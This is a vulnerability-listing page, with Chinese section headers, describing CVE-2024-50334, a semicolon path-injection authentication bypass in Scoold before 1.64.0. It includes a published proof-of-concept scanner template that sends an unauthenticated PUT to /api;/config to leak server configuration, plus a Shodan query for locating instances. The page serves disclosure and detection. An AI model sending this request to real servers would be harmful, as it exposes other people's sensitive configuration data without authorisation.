CVE-2024-50334: Scoold < 1.64.0 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Scoold | POC: 已公开

漏洞描述

Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type- application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.

PoC代码[已公开]

id: CVE-2024-50334

info:
  name: Scoold < 1.64.0 - Authentication Bypass
  author: xbow,iamnoooob,pdresearch
  severity: medium
  description: |
    Scoold is a Q&A and a knowledge sharing platform for teams. A semicolon path injection vulnerability was found on the /api;/config endpoint. By appending a semicolon in the URL, attackers can bypass authentication and gain unauthorised access to sensitive configuration data. Furthermore, PUT requests on the /api;/config endpoint while setting the Content-Type- application/hocon header allow unauthenticated attackers to file reading via HOCON file inclusion. This allows attackers to retrieve sensitive information such as configuration files from the server, which can be leveraged for further exploitation. The vulnerability has been fixed in Scoold 1.64.0. A workaround would be to disable the Scoold API with scoold.api_enabled = false.
  reference:
    - https://xbow.com/blog/xbow-scoold-vuln/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-50334
    - https://github.com/Erudika/scoold/releases/tag/1.64.0
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-50334
    cwe-id: CWE-288
    epss-score: 0.05035
    epss-percentile: 0.89338
    cpe: cpe:2.3:a:erudika:scoold:*:*:*:*:*:*:*:*
  metadata:
    vendor: erudika
    product: scoold
    shodan-query: html:"scoold-wrapper"
    verified: true
    max-request: 1
  tags: cve,cve2024,scoold,info-leak,erudika,auth-bypass,vkev

http:
  - raw:
      - |
        PUT /api;/config HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/hocon

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "scoold.app_name")'
          - 'contains(content_type,"application/json")'
          - 'status_code==200'
        condition: and
# digest: 490a0046304402206542f9d46c58f641163f75e3897074d82be44292f5e42a920d914227c7e3fae702201b73bc471ee1f258c39d9466b5f7d1c75faf524b9549de13eb0e97144b85714a:922c64590222798bb761d5b6d8e72950

相关漏洞推荐